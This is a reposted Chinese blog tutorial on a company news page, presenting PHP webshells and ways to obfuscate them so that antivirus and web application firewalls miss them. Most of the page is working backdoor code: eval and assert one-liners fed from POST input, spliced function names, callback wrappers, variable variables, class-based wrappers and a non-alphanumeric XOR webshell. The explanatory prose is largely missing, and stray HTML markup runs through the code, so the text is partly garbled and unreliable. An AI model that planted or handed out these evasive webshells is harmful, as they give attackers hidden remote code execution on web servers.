网络安全

了解最新公司动态及行业资讯

当前位置:首页>新闻资讯>网络安全
全部 12 公司动态 2 网络安全 10

【实战技巧】webshell多种方法免杀

时间:2021-01-08   访问量:1329

webshell西webgetshell


01


 

WAFwebshell

wafwaf


D

D_IIS, , !


02


PHP

php

php

1<?php eval(@$_POST['a']); ?>


 eval () 

$_POST[a] a

evalPHP

便

assert

1<?php assert(@$_POST['a']); ?>


php5php7


php5assert$f='assert';$f(...);

php7asserteval

PHPevalPHPassertPHP


eval()   

assert() 便

1<?php
2$func = $_GET[<span data-raw-text="" "="" data-textnode-index="49" data-index="870" class="character" style="margin: 0px; padding: 0px;">"func<span data-raw-text="" "="" data-textnode-index="49" data-index="875" class="character" style="margin: 0px; padding: 0px;">"];
3assert(<span data-raw-text="" "="" data-textnode-index="53" data-index="886" class="character" style="margin: 0px; padding: 0px;">"$func()<span data-raw-text="" "="" data-textnode-index="53" data-index="894" class="character" style="margin: 0px; padding: 0px;">");
4?>
5# >


03


 assert


assertassertfalseWarning使asserteval


便php



04


1<?php
2$a = substr_replace(<span data-raw-text="" "="" data-textnode-index="78" data-index="1193" class="character" style="margin: 0px; padding: 0px;">"xxser<span data-raw-text="" "="" data-textnode-index="78" data-index="1199" class="character" style="margin: 0px; padding: 0px;">"
,<span data-raw-text="" "="" data-textnode-index="80" data-index="1201" class="character" style="margin: 0px; padding: 0px;">"asser<span data-raw-text="" "="" data-textnode-index="80" data-index="1207" class="character" style="margin: 0px; padding: 0px;">",-3);
3$aa = array('',$a);
4$b = $aa[1].chr('116');
5$fun=preg_replace(<span data-raw-text="" "="" data-textnode-index="98" data-index="1276" class="character" style="margin: 0px; padding: 0px;">"/xx/<span data-raw-text="" "="" data-textnode-index="98" data-index="1281" class="character" style="margin: 0px; padding: 0px;">",<span data-raw-text="" "="" data-textnode-index="100" data-index="1283" class="character" style="margin: 0px; padding: 0px;">"<span data-raw-text="" "="" data-textnode-index="100" data-index="1284" class="character" style="margin: 0px; padding: 0px;">",$b);
6$cc = substr_replace(<span data-raw-text="" "="" data-textnode-index="104" data-index="1312" class="character" style="margin: 0px; padding: 0px;">"<span data-raw-text="" "="" data-textnode-index="104" data-index="1313" class="character" style="margin: 0px; padding: 0px;">",$fun,0);
7
8$cc($_POST['x']);
9?>





05





1

,

 1<?php 
2
3function zeo($b){
4    return $b;
5}
6function ass($a){
7    return eval($a);
8}
9function post(){
10    return $_POST['x'];
11}    
12
13function run(){
14    return zeo(ass)(zeo(post)());
15}
16
17zeo(ass)(zeo(post)());
18
19?>



2+

,

 1call_user_func_array()
2call_user_func()
3array_filter() 
4array_walk()  
5array_map()
6array_reduce()
7array_walk() 
8array_walk_recursive()
9filter_var() 
10filter_var_array() 
11uasort() 
12uksort() 
13registregister_shutdown_function()
14register_tick_function()
15forward_static_call_array(assert,array($_POST[x]));


 1<?php 
2function zeo($c,$d){
3    pj()($c,$d);
4}
5function pj(){
6    return <span data-raw-text="" "="" data-textnode-index="249" data-index="2133" class="character" style="margin: 0px; padding: 0px;">"register_shut<span data-raw-text="" "="" data-textnode-index="249" data-index="2147" class="character" style="margin: 0px; padding: 0px;">"
.<span data-raw-text="" "="" data-textnode-index="251" data-index="2149" class="character" style="margin: 0px; padding: 0px;">"down_function<span data-raw-text="" "="" data-textnode-index="251" data-index="2163" class="character" style="margin: 0px; padding: 0px;">";
7}
8
9$b=$_POST['x'];
10zeo(assert,$b);
11?>



3

4

1<?php
2$b = substr_replace(<span data-raw-text="" "="" data-textnode-index="272" data-index="2288" class="character" style="margin: 0px; padding: 0px;">"assexx<span data-raw-text="" "="" data-textnode-index="272" data-index="2295" class="character" style="margin: 0px; padding: 0px;">"
,<span data-raw-text="" "="" data-textnode-index="274" data-index="2297" class="character" style="margin: 0px; padding: 0px;">"rt<span data-raw-text="" "="" data-textnode-index="274" data-index="2300" class="character" style="margin: 0px; padding: 0px;">",4);
3$a = array($arrayName = ($arrayName =($arrayName = array('a' => $b($_POST['x'])))));
4?>



5

PHP使

1$a = 'hello';
2$$a = 'world';
3echo $hello;
4# world


ahello

使ahelloaworld

world

1<?php 
2$zeo='dalao';
3$$zeo=$_POST['x'];
4eval($dalao);
5?>


image-20200407220547482

eval


06


 


fuzz

null

1<?php 
2$zeo='dalao';
3$$zeo=$_POST['x'];
4eval(``.$dalao);
5?>


07


 使


D

 1<?php 
2class zeo2
3
{
4  public $b ='';
5
6  function post(){
7    return $_POST['x'];
8  }
9}
10class zeo extends zeo2
11
{
12  public $code=null;
13  function __construct(){
14          $code=parent::post();
15    assert($code);
16  }
17}
18$blll = new zeo;
19$bzzz = new zeo2;
20?>



08



a-z

PHP

assert

P

https://www.leavesongs.com/PENETRATION/webshell-without-alphanum.html


1<?php
2@$_++;
3$__ = (<span data-raw-text="" "="" data-textnode-index="455" data-index="3525" class="character" style="margin: 0px; padding: 0px;">"`<span data-raw-text="" "="" data-textnode-index="455" data-index="3527" class="character" style="margin: 0px; padding: 0px;">" ^ <span data-raw-text="" "="" data-textnode-index="457" data-index="3531" class="character" style="margin: 0px; padding: 0px;">"?<span data-raw-text="" "="" data-textnode-index="457" data-index="3533" class="character" style="margin: 0px; padding: 0px;">") . (<span data-raw-text="" "="" data-textnode-index="459" data-index="3539" class="character" style="margin: 0px; padding: 0px;">":<span data-raw-text="" "="" data-textnode-index="459" data-index="3541" class="character" style="margin: 0px; padding: 0px;">" ^ <span data-raw-text="" "="" data-textnode-index="461" data-index="3545" class="character" style="margin: 0px; padding: 0px;">"}<span data-raw-text="" "="" data-textnode-index="461" data-index="3547" class="character" style="margin: 0px; padding: 0px;">") . (<span data-raw-text="" "="" data-textnode-index="463" data-index="3553" class="character" style="margin: 0px; padding: 0px;">"%<span data-raw-text="" "="" data-textnode-index="463" data-index="3555" class="character" style="margin: 0px; padding: 0px;">" ^ <span data-raw-text="" "="" data-textnode-index="465" data-index="3559" class="character" style="margin: 0px; padding: 0px;">"`<span data-raw-text="" "="" data-textnode-index="465" data-index="3561" class="character" style="margin: 0px; padding: 0px;">") . (<span data-raw-text="" "="" data-textnode-index="467" data-index="3567" class="character" style="margin: 0px; padding: 0px;">"{<span data-raw-text="" "="" data-textnode-index="467" data-index="3569" class="character" style="margin: 0px; padding: 0px;">" ^ <span data-raw-text="" "="" data-textnode-index="469" data-index="3573" class="character" style="margin: 0px; padding: 0px;">"/<span data-raw-text="" "="" data-textnode-index="469" data-index="3575" class="character" style="margin: 0px; padding: 0px;">");
4$___ = (<span data-raw-text="" "="" data-textnode-index="473" data-index="3587" class="character" style="margin: 0px; padding: 0px;">"$<span data-raw-text="" "="" data-textnode-index="473" data-index="3589" class="character" style="margin: 0px; padding: 0px;">" ^ <span data-raw-text="" "="" data-textnode-index="475" data-index="3593" class="character" style="margin: 0px; padding: 0px;">"{<span data-raw-text="" "="" data-textnode-index="475" data-index="3595" class="character" style="margin: 0px; padding: 0px;">") . (<span data-raw-text="" "="" data-textnode-index="477" data-index="3601" class="character" style="margin: 0px; padding: 0px;">"~<span data-raw-text="" "="" data-textnode-index="477" data-index="3603" class="character" style="margin: 0px; padding: 0px;">" ^ <span data-raw-text="" "="" data-textnode-index="479" data-index="3607" class="character" style="margin: 0px; padding: 0px;">".<span data-raw-text="" "="" data-textnode-index="479" data-index="3609" class="character" style="margin: 0px; padding: 0px;">") . (<span data-raw-text="" "="" data-textnode-index="481" data-index="3615" class="character" style="margin: 0px; padding: 0px;">"/<span data-raw-text="" "="" data-textnode-index="481" data-index="3617" class="character" style="margin: 0px; padding: 0px;">" ^ <span data-raw-text="" "="" data-textnode-index="483" data-index="3621" class="character" style="margin: 0px; padding: 0px;">"`<span data-raw-text="" "="" data-textnode-index="483" data-index="3623" class="character" style="margin: 0px; padding: 0px;">") . (<span data-raw-text="" "="" data-textnode-index="485" data-index="3629" class="character" style="margin: 0px; padding: 0px;">"-<span data-raw-text="" "="" data-textnode-index="485" data-index="3631" class="character" style="margin: 0px; padding: 0px;">" ^ <span data-raw-text="" "="" data-textnode-index="487" data-index="3635" class="character" style="margin: 0px; padding: 0px;">"~<span data-raw-text="" "="" data-textnode-index="487" data-index="3637" class="character" style="margin: 0px; padding: 0px;">") . (<span data-raw-text="" "="" data-textnode-index="489" data-index="3643" class="character" style="margin: 0px; padding: 0px;">"(<span data-raw-text="" "="" data-textnode-index="489" data-index="3645" class="character" style="margin: 0px; padding: 0px;">" ^ <span data-raw-text="" "="" data-textnode-index="491" data-index="3649" class="character" style="margin: 0px; padding: 0px;">"|<span data-raw-text="" "="" data-textnode-index="491" data-index="3651" class="character" style="margin: 0px; padding: 0px;">");
5('%05'^'`')
6#  ^,PHP,,,
7${$__}[!$_](${$___}[$_]);
8?>


便

PHPPHP


god_zZz's Blog

https://blog.csdn.net/god_zzZ/article/details/112007388



上一篇:没有了!

下一篇:从原理到实战之对XSS的一次深入分析